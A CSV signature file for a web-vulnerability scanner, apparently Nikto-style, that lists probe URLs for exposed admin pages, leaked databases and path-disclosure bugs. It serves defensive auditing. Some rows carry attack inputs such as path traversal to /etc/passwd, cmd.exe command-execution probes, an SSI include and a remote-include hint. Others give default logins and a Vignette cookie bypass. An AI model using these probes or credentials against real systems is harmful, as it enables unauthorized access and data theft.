"000212","0","1","/server/","GET","200","","","","","If port 8000, Macromedia Jrun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","",""
"000213","0","1","@CGIDIRSfpsrvadm.exe","GET","200","","","","","Potentially vulnerable CGI program.","",""
"000214","0","1b","/siteminder/smadmin.html","GET","Admin Login","","","","","SiteMinder admin login page available.","",""
"000215","0","1b","/vgn/ac/data","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000216","0","1b","/vgn/ac/delete","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000217","0","1b","/vgn/ac/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000218","0","1b","/vgn/ac/esave","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000219","0","1b","/vgn/ac/fsave","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000220","0","1b","/vgn/ac/index","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000221","0","1b","/vgn/asp/MetaDataUpdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000222","0","1b","/vgn/asp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000223","0","1b","/vgn/asp/status","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000224","0","1b","/vgn/asp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000225","0","1b","/vgn/errors","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000226","0","1b","/vgn/jsp/controller","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000227","0","1b","/vgn/jsp/errorpage","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000228","0","1b","/vgn/jsp/initialize","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000229","0","1b","/vgn/jsp/jspstatus","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000230","0","1b","/vgn/jsp/jspstatus56","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000231","0","1b","/vgn/jsp/metadataupdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000232","0","1b","/vgn/jsp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000233","0","1b","/vgn/jsp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000234","0","1b","/vgn/legacy/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000235","0","1b","/vgn/login","GET","200","","","","","Vignette server may allow user enumeration based on the login attempts to this file.","",""
"000236","0","2","/webtop/wdk/samples/index.jsp","GET","WDK Fusion Samples","","","","","Documentum Webtop Example Code","",""
"000237","0","2","@CGIDIRS.cobalt","GET","200","","","","","May allow remote admin of CGI scripts.","",""
"000238","0","2","/WEB-INF/web.xml","GET","web-app","","","","","JRUN default file found.","",""
"000239","35707","23","/forum/admin/wwforum.mdb","GET","200","","","","","Web Wiz Forums password database found.","",""
"000240","0","23","/fpdb/shop.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web."," ",""
"000241","0","23","/guestbook/admin/o12guest.mdb","GET","200","","","","","Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.","",""
"000242","0","23","/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","",""
"000243","0","23","/MIDICART/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","",""
"000244","0","23","/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb","GET","200","","","","","MPCSoftWeb Guest Book passwords retrieved.","",""
"000245","0","23","/news/news.mdb","GET","200","","","","","Web Wiz Site News realease v3.06 admin password database is available and unencrypted.","",""
"000246","0","23","/newuser?Image=../../database/rbsserv.mdb","GET","SystemErrorsPerHour","","","","","The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server.","",""
"000247","0","23","/shopdbtest.asp","GET","xDatabase","","","","","VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).","",""
"000248","0","23","/shopping300.mdb","GET","200","","","","","VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.","",""
"000249","0","23","/shopping400.mdb","GET","200","","","","","VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.","",""
"000250","0","23","/shoppingdirectory/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","",""
"000251","0","23","/SilverStream/Meta/Tables/?access-mode=text","GET","_DBProduct","","","","","The SilverStream database structure is available for remote viewing.","",""
"000252","0","23","/database/db2000.mdb","GET","200","","","","","Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.","",""
"000253","0","28","@CGIDIRSmailit.pl","GET","200","","","","","Sambar may allow anonymous email to be sent from any host via this CGI.","",""
"000254","0","3","/cgi-bin/search","GET","=sourcedir","","","","","Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value).","",""
"000255","0","3","/doc/webmin.config.notes","GET","login and password","","","","","Webmin config file found, may contain Webmin ID/Password. Typically runs on port 10000.","",""
"000256","0","3","/error/HTTP_NOT_FOUND.html.var","GET","Available variants","","","","","Apache reveals file system paths when invalid error documents are requested.","",""
"000257","0","3","/oem_webstage/cgi-bin/oemapp_cgi","GET","This script","","","","","Oracle reveals the CGI source by prepending /oem_webstage to CGI urls.","",""
"000258","0","3","@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","",""
"000259","0","3","@CGIDIRS.access","GET","200","","","","","Contains authorization information","",""
"000260","0","3","@CGIDIRS%2e%2e/abyss.conf","GET","200","","","","","The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/","",""
"000261","0","3","@CGIDIRSdata/fetch.php?page=","GET","mysql_num_rows","","","","","StellarDocs allows remote users to see file system paths. BID-8385.","",""
"000262","0","3","@CGIDIRSempower?DB=whateverwhatever","GET","db name whateverwhatever of directory /","","","","","This CGI allows attackers to learn the full system path to your web directory.","",""
"000263","0","3","@CGIDIRSmrtg.cgi?cfg=blah","GET","Cannot find the given config file","","","","","Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version.","",""
"000264","0","3","@CGIDIRSstore/agora.cgi?page=whatever33.html","GET","FILE:","","","","","Agora.cgi gives detailed error messages including file system paths.","",""
"000265","0","3","/?mod=node&nid=some_thing&op=view","GET","/node.module.php","","","","","Sage 1.0b3 may reveal system paths with invalid module names.","",""
"000266","0","3","/?mod=some_thing&op=browse","GET","in /","","","","","Sage 1.0b3 reveals system paths with invalid module names.","",""
"000267","0","3","/article.php?article=4965&post=1111111111","GET","Unable to jump to row","","","","","PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent.","",""
"000268","0","3","/blah123.php","GET","Failed opening ","","","","","PHP is configured to give descriptive error messages which can reveal file system paths.","",""
"000269","0","3","/categorie.php3?cid=june","GET","Unable to jump to row","","","","","Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent.","",""
"000270","3233","3","/CFIDE/probe.cfm","GET","coldfusion.tagext.lang","","","","","Cold Fusion file probe.cfm reveals system information, such as the path to the web server. In the 'Debugging Settings' page in the Administrator console, suppress the installation path displayed in error messages by selecting 'Enable Robust Exception Info","",""
"000271","0","3","/contents.php?new_language=elvish&mode=select","GET","200","","","","","Requesting a file with an invalid language selection from DC Portal may reveal the system path.","",""
"000272","0","3","/download.php?op=viewdownload","GET","Failed opening","","","","","PHPNuke allows file system paths to be revealed.","",""
"000273","0","3","/download.php?op=viewdownload","GET","Fatal error","","","","","PHPNuke allows file system paths to be revealed.","",""
"000274","0","3","/examples/basic/servlet/HelloServlet","GET","The source of this servlet is in","","","","","Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet.","",""
"000275","0","3","/home.php?arsc_language=elvish","GET","Failed opening '","","","","","ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified.","",""
"000276","0","3","/hostadmin/?page='","GET","C:\",","","","","","Host Admin reveals install location and other sensitive information.","",""
"000277","0","3","/hostadmin/?page='","GET","D:\",","","","","","Host Admin reveals install location and other sensitive information.","",""
"000278","0","3","/index.php?file=index.php","GET","Fatal error:","","","","","PHPNuke 5.4 allows file system paths to be shown in error messages.","",""
"000279","0","3","/jgb_eng_php3/cfooter.php3","GET","Fatal error","","","","","Justice Guestbook may reveal file system paths in error messages.","",""
"000280","0","3","/JUNK(5).csp","GET","File not found: /","","","","","Invalid files with .csp extension reveal the file system path to the web root.","",""
"000281","0","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Failed opening","","","","","PHPNuke allows file system paths to be revealed.","",""
"000282","0","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Fatal error","","","","","PHPNuke allows file system paths to be revealed.","",""
"000283","0","3","/modules.php?op=modload&name=0&file=0","GET","Failed opening ","","","","","PHP Nuke is configured to give descriptive error messages which can reveal file system paths.","",""
"000284","0","3","/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=","GET","non-object in","","","","","Postnuke v0.7.2.3-Phoenix and below reveal the file system path.","",""
"000285","0","3","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink","GET","Failed opening ","","","","","PHP Nuke is configured to give descriptive error messages which can reveal file system paths.","",""
"000286","0","3","/path/nw/article.php?id='","GET","c:/","","","","","News Wizard 2.0 reveals the file system path.","",""
"000287","0","3","/path/nw/article.php?id='","GET","d:/","","","","","News Wizard 2.0 reveals the file system path.","",""
"000288","0","3","/pw/storemgr.pw","GET","200","","","","","Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.","",""
"000289","0","3","/rtm.log","GET","HttpPost Retry","","","","","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.","",""
"000290","0","3","/scozbook/view.php?PG=whatever","GET","Warning","","","","","ScozBook Beta 1.1 may reveal file system paths in error messages.","",""
"000291","0","3","/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter","GET","200","Error Occurred","","","","Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->",""
"000292","0","3","/shopa_sessionlist.asp","GET","200","","","","","VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.","",""
"000293","0","3","/simplebbs/users/users.php","GET","200","","","","","Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.","",""
"000294","0","3","/sips/sipssys/users/a/admin/user","GET","Password","","","","","SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.","",""
"000295","3093","2","/tcb/files/auth/r/root","GET","u_pwd","","","","","HP-UX has the tcb auth file system on the web server.","",""
"000296","0","3","/typo3conf/","GET","200","","","","","This may contain sensitive Typo3 files.","",""
"000297","0","3","/typo3conf/database.sql","GET","200","","","","","Typo3 sql file found.","",""
"000298","0","3","/typo3conf/localconf.php","GET","200","","","","","Typo3 config file found.","",""
"000299","0","3","/vchat/msg.txt","GET","200","","","","","VChat allows user information to be retrieved.","",""
"000300","0","3","/vgn/license","GET","200","","","","","Vignette server license file found.","",""
"000301","3092","3","/web.config","GET","200","","","","","ASP config file found.","",""
"000302","3233","3","/webamil/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","",""
"000303","0","3","/webcart-lite/config/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","",""
"000304","0","3","/webcart-lite/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","",""
"000305","0","3","/webcart/carts/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","",""
"000306","0","3","/webcart/config/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","",""
"000307","0","3","/webcart/config/clients.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","",""
"000308","0","3","/webcart/orders/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","",""
"000309","0","3","/webcart/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","",""
"000310","0","3","/webmail/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","",""
"000311","0","3","/whateverJUNK(4).html","GET","InterScan HTTP Version","","","","","InterScan VirusWall on the remote host reveals its version number in HTTP error messages.","",""
"000312","0","3","/ws_ftp.ini","GET","200","","","","","Can contain saved passwords for ftp sites","",""
"000313","0","3","/WS_FTP.ini","GET","200","","","","","Can contain saved passwords for ftp sites","",""
"000314","0","3","@CGIDIRSMsmMask.exe","GET","200","","","","","MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real asp file.","",""
"000315","0","3","/_mem_bin/auoconfig.asp","GET","200","","","","","Displays the default AUO (LDAP) schema, including host and port.","",""
"000316","0","3","/_mem_bin/auoconfig.asp","GET","LDAP","","","","","LDAP information revealed via asp. See http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm","",""
"000317","17664","3","/_mem_bin/remind.asp","GET","Recover","","","","","Page will give the password reminder for any user requested (username must be known).","",""
"000318","0","3","/exchange/lib/ATTACH.INC","GET","File upload","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000319","17659","3","/SiteServer/Admin/knowledge/persmbr/vs.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","",""
"000320","17661","3","/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","",""
"000321","17662","3","/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","",""
"000322","17660","3","/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","",""
"000323","0","3","/trace.axd","GET","Application Trace","","","","","The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.","",""
"000324","0","3","/tvcs/getservers.exe?action=selects1","GET","200","","","","","Following steps 2-4 of this page may reveal a zip file which contains passwords and system details.","",""
"000325","0","3","/whatever.htr","GET","<html>Error: The requested file could not be found. </html>","","","","","Reveals physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see MS02-018)","",""
"000326","0","3","/whatever.htr","GET","200","","","","","Reveals physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see MS02-018)","",""
"000327","0","3","/./","GET","Index of ","","","","","Appending '/./' to a directory allows indexing","",""
"000328","0","3","/nsn/fdir.bas:ShowVolume","GET","200","","","","","You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in","",""
"000329","0","3","/nsn/fdir.bas","GET","200","","","","","You can use fdir to ShowVolume and ShowDirectory.","",""
"000330","0","3","/servlet/webacc?User.html=noexist","GET","templates/","","","","","Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.","",""
"000331","0","4","/forum/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","",""
"000332","0","4","/webmail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","",""
"000333","0","5","/jamdb/","GET","200","","","","","JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.","",""
"000334","0","6","/cgi/cgiproc?","GET","200","","","","","It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.","",""
"000335","0","7","@CGIDIRSaddbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","",""
"000336","0","7","@CGIDIRSaf.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","",""
"000337","0","7","@CGIDIRSalienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","",""
"000338","0","7","@CGIDIRSshtml.dll","GET","200","","","","","This may allow attackers to retrieve document source.","",""
"000339","2400","7","/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv","GET","root:","","","","","iPlanet Administration Server 5.1 allows remote users to download any file from the server. Upgrade to SunOne DS5.2 and in iDS5.1 SP2 Hotfix 2."," ",""
"000340","0","8","@CGIDIRSaglimpse.cgi","GET","200","","","","","This CGI may allow attackers to execute remote commands.","",""
"000341","0","8","@CGIDIRSaglimpse","GET","200","","","","","This CGI may allow attackers to execute remote commands.","",""
"000342","0","8","@CGIDIRSarchitext_query.cgi","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","",""
"000343","0","8","/cgi-local/cgiemail-1.4/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","",""
"000344","0","8","/cgi-local/cgiemail-1.6/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","",""
"000345","0","8","/servlet/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999","",""
"000346","0","8","/servlet/sunexamples.BBoardServlet","GET","200","Error Occurred","","","","This default servlet lets attackers execute arbitrary commands."," ",""
"000347","0","8","/servlets/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999","",""
"000348","0","8","@CGIDIRScmd.exe?/c+dir","GET","200","","","","","cmd.exe can execute arbitrary commands","",""
"000349","0","8","@CGIDIRScmd1.exe?/c+dir","GET","200","","","","","cmd1.exe can execute arbitrary commands","",""
"000350","0","8","@CGIDIRShello.bat?&dir+c:\",","GET","200","","","","","This batch file may allow attackers to execute remote commands.","",""
"000351","0","8","@CGIDIRSpost32.exe|dir%20c:\",","GET","200","","","","","post32 can execute arbitrary commands","",""
"000352","0","8","/perl/-e%20print%20Hello","GET","200","","","","","The PERL interpreter on the novell system may allow any command to be executed. See BID-5520. Installing Perl 5.6 might fix this issue.","",""
"000353","0","a","/admin.cgi","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","",""
"000354","0","a","/interscan/","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","",""
"000355","0","a","/vgn/legacy/save","GET","200","","","","","Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.","",""
"000356","0","b","/","GET","default Tomcat","","","","","Appears to be a default Apache Tomcat install.","",""
"000357","0","b","/IDSWebApp/IDSjsp/Login.jsp","GET","200","","","","","Tivoli Directory Server Web Administration.","",""
"000358","0","b","/quikstore.cfg","GET","200","","","","","Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt","",""
"000359","0","b","/quikstore.cgi","GET","200","","","","","A shopping cart.","",""
"000360","0","b","/securecontrolpanel/","GET","200","","","","","Web Server Control Panel","",""
"000361","0","b","/siteminder","GET","200","","","","","This may be an indication that the server is running Siteminder for SSO","",""
"000362","0","b","/webmail/","GET","200","","","","","Web based mail package installed.","",""
"000363","0","b","/Xcelerate/LoginPage.html","GET","Xcelerate Login Page","","","","","Xcelerate Content Server by Divine/OpenMarket login page found.","",""
"000364","0","b","/_cti_pvt/","GET","200","","","","","FrontPage directory found.","",""
"000365","0","b","/smg_Smxcfg30.exe?vcc=3560121183d3","GET","200","","","","","This may be a Trend Officesan 'backdoor'.","",""
"000366","0","2b","/examples/servlets/index.html","GET","Servlet Examples","","","","","Apache Tomcat default JSP pages present.","",""
"000367","0","3b","/nsn/..%5Cutil/attrib.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000368","0","3b","/nsn/..%5Cutil/chkvol.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000369","0","3b","/nsn/..%5Cutil/copy.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000370","0","3b","/nsn/..%5Cutil/del.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000371","0","3b","/nsn/..%5Cutil/dir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000372","0","3b","/nsn/..%5Cutil/dsbrowse.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000373","0","3b","/nsn/..%5Cutil/glist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000374","0","3b","/nsn/..%5Cutil/lancard.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000375","0","3b","/nsn/..%5Cutil/md.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000376","0","3b","/nsn/..%5Cutil/rd.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000377","0","3b","/nsn/..%5Cutil/ren.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server ","",""
"000378","0","3b","/nsn/..%5Cutil/send.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000379","0","3b","/nsn/..%5Cutil/set.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000380","0","3b","/nsn/..%5Cutil/slist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000381","0","3b","/nsn/..%5Cutil/type.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000382","0","3b","/nsn/..%5Cutil/userlist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000383","0","3b","/nsn/..%5Cweb/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000384","0","3b","/nsn/..%5Cweb/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000385","0","3b","/nsn/..%5Cwebdemo/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000386","0","3b","/nsn/..%5Cwebdemo/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000387","0","c","/wikihome/action/conflict.php","GET","200","","","","","Some versions of this script allow external source to be included/run by appending ?TemplateDir=http://my.host/ to requests.","",""
"000388","0","1","@CGIDIRSarchie","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000389","0","1","@CGIDIRScalendar.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000390","0","1","@CGIDIRScalendar","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000391","0","1","@CGIDIRSdate","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000392","0","1","@CGIDIRSfortune","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000393","0","1","@CGIDIRSredirect","GET","200","","","","","Redirects via URL from form","",""
"000394","0","1","@CGIDIRSuptime","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000395","0","1","@CGIDIRSwais.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000396","0","2","//","GET","index of","","","","","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.","",""
"000397","0","2","/webtop/wdk/","GET","Directory Listing for /wdk/","","","","","Documentum Webtop Server appears to be installed","",""
"000398","0","2","/SilverStream","GET","/Pages","","","","","SilverStream allows directory listing","",""
"000399","0","2","/signon","GET","Administrator Login","","","","","Tivoli administrator login found. Test the default login of admin/admin.  Tivoli allows system administration.","",""
"000400","0","2","/upd/","GET","200","","","","","WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000401","0","3","/examples/jsp/source.jsp??","GET","Directory Listing","","","","","Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed.","",""
"000402","0","3","/lpt9","GET","FileNotFoundException:","","","","","Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher.","",""
"000403","0","3","/cfcache.map","GET","Mapping","","","","","May leak directory listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/ColdFusion_Information_Exposure__CFCACHE_Tag_.html","",""
"000404","0","3","/cfdocs/cfcache.map","GET","Mapping","","","","","May leak directory listing, may also leave server open to a DOS","",""
"000405","0","3","/CVS/Entries","GET","200","","","","","CVS Entries file may contain directory listing information.","",""
"000406","0","3","/lpt9.xtp","GET","java.io.FileNotFoundException:","","","","","Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.","",""
"000407","0","3","/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc","GET","passwd","404","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","",""
"000408","8450","37","@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc","GET","passwd","404","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","",""
"000409","0","3","/asp/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000410","0","3","/asp/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000411","0","3","/iissamples/issamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000412","0","3","/iissamples/issamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000413","0","3","/ISSamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000414","0","3","/ISSamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000415","0","3","/junk.aspx","GET","NET Framework Version:","","[FileNotFoundException]:","","","ASP.net reveals its version in invalid .aspx error messages.","",""
"000416","0","3","/oc/Search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000417","0","3","/oc/Search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000418","0","3","/search/htx/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000419","0","3","/search/htx/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000420","0","3","/search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000421","0","3","/search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000422","0","3","/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000423","0","3","/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000424","0","3","@CGIDIRScom5..........................................................................................................................................................................................................................box","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","",""
"000425","0","3","@CGIDIRScom5.java","GET","Execution of","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","",""
"000426","0","3","@CGIDIRScom5.pl","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","",""
"000427","0","3","/?Open","GET","nsf","","","","","This displays a list of all databases on the server. Disable this capability via server options.","",""
"000428","0","3","/?OpenServer","GET","\/icons\/abook\.gif","","","","","This install allows remote users to enumerate DB names, see http://www.securiteam.com/securitynews/6W0030U35W.html","",""
"000429","0","3","/catalog.nsf","GET","200","","","","","A list of server databases can be retrieved, as well as a list of ACLs.","",""
"000430","0","3","/cersvr.nsf","GET","200","","","","","Server certificate data can be accessed remotely.","",""
"000431","0","3","/cgi-bin/testing_whatever","GET","domino/cgi-bin","","","","","The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.","",""
"000432","0","3","/domlog.nsf","GET","200","","","","","The domain server logs can be accessed remotely.","",""
